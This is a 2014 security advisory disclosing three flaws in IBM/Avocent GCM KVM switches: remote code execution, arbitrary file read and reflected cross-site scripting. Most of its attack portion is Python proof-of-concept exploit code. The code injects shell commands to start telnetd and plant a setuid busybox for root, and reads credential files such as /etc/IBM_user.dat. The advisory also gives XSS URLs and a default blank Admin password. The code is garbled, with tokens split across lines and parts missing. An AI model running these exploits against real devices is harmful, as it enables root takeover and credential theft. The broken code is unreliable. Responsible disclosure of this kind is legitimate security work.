*
Product description
*
The IBM
1754
GCM family provides KVM over IP
and
serial console management
technology
in
a single appliance. Versions v1.
20.0
.
22575
and
prior are
vulnerables.
Note that this vulnerability
is
also present
in
some DELL
and
probably
other vendors of this rebranded KVM. I contacted Dell but no response has
been received.
*
1.
Remote code execution
*
CVEID: CVE
-
2014
-
2085
Description: Improperly sanitized
input
may allow a remote authenticated
attacker to perform remote code execution on the GCM KVM switch.
PoC of this vulnerability:
#!/usr/bin/python"""
Exploit
for
Avocent KVM switch v1.
20.0
.
22575.
Remote code execution with privilege elevation.
SessionId (avctSessionId)
is
neccesary
for
this to work, so you need a
valid user. Default user
is
"Admin"
with blank password.
After running exploit, connect using telnet to device with user target
(
pass
: target) then do
"/tmp/su -"
to gain root (password
"root"
)
alex.a.bravo@gmail.com
"""
from
StringIO
import
StringIO
import
pycurl
import
os
sessid
=
"1111111111"
target
=
"192.168.0.10"
sbin
/
telnetd
%
20
;
%
20cp
%
20
/
bin
/
busybox
%
20
/
tmp
/
su
%
20
;
%
20chmod
%
206755
%
20
/
tmp
/
su
%
20
;"
storage
=
StringIO()
c
=
pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,
0
)
c.setopt(c.SSL_VERIFYHOST,
0
)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE,
'avctSessionId='
+
sessid)
try
:
print
"[*] Sending GET to "
+
target
+
" with session id "
+
sessid
+
"..."
c.perform()
c.close()
except
:
print
""
finally
:
print
"[*] Done"
print
"[*] Trying telnet..."
print
"[
*
] Login as target
/
target, then do
/
tmp
/
su
-
and
enter password
\
"root\""
os.system(
"telnet "
+
target)
*
2.
Arbitrary
file
read
*
CVEID: CVE
-
2014
-
3081
Description: This device allows
any
authenticated user to read arbitrary
files. Files can be anywhere on the target.
PoC of this vulnerability:
#!/usr/bin/python
"""
This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to
read arbitrary files on device.
SessionId (avctSessionId) is neccesary for this to work, so you need a
valid user.
alex.a.bravo@gmail.com
"""
from
StringIO
import
StringIO
import
pycurl
sessid
=
"1111111111"
target
=
"192.168.0.10"
file
=
"/etc/IBM_user.dat"
bits&display
=
results&filename
=
"
+
file
storage
=
StringIO()
c
=
pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,
0
)
c.setopt(c.SSL_VERIFYHOST,
0
)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE,
'avctSessionId='
+
sessid)
try
:
c.perform()
c.close()
except
:
print
""
content
=
storage.getvalue()
print
content.replace(
"<td>"
,"
").replace("
<
/
td>
","
")
*
3.
Cross site scripting non
-
persistent
*
CVEID: CVE
-
2014
-
3080
Description: System
is
vulnerable to cross
-
site scripting, caused by
improper validation of user
-
supplied
input
. A remote attacker could exploit
this vulnerability using a specially
-
crafted URL to execute script
in
a
victim's Web browser within the security context of the hosting Web site,
once the URL
is
clicked. An attacker could use this vulnerability to steal
the victim's cookie
-
based authentication credentials.
Examples:
http:
/
/
kvm
/
kvm.cgi?
%
3Cscript
%
3Ealert
%
28
%
22aaa
%
22
%
29
%
3C
/
script
%
3E
https:
/
/
kvm
/
avctalert.php?arg1
=
dadadasdasd&arg2
=
dasdasdas&key
=
%
3Cscript
%
3Ealert
%
28
%
22aaa
%
22
%
29
%
3C
/
script
%
3E
*
Vendor Response:
*
IBM release
1.20
.
20.23447
firmware
*
Timeline:
*
2014
-
05
-
20
-
Vendor (PSIRT) notified
2014
-
05
-
21
-
Vendor assigns internal
ID
2014
-
07
-
16
-
Patch Disclosed
2014
-
07
-
17
-
Vulnerability disclosed
*
External Information:
*
Info about the vulnerability (spanish):
http:
/
/
www.bitcloud.es
/
2014
/
07
/
tres
-
nuevas
-
vulnerabilidades
-
en
-
ibm
-
gcm.html
IBM Security Bulletin:
http:
/
/
www
-
947.ibm
.com
/
support
/
entry
/
portal
/
docdisplay?lndocid
=
MIGR
-
5095983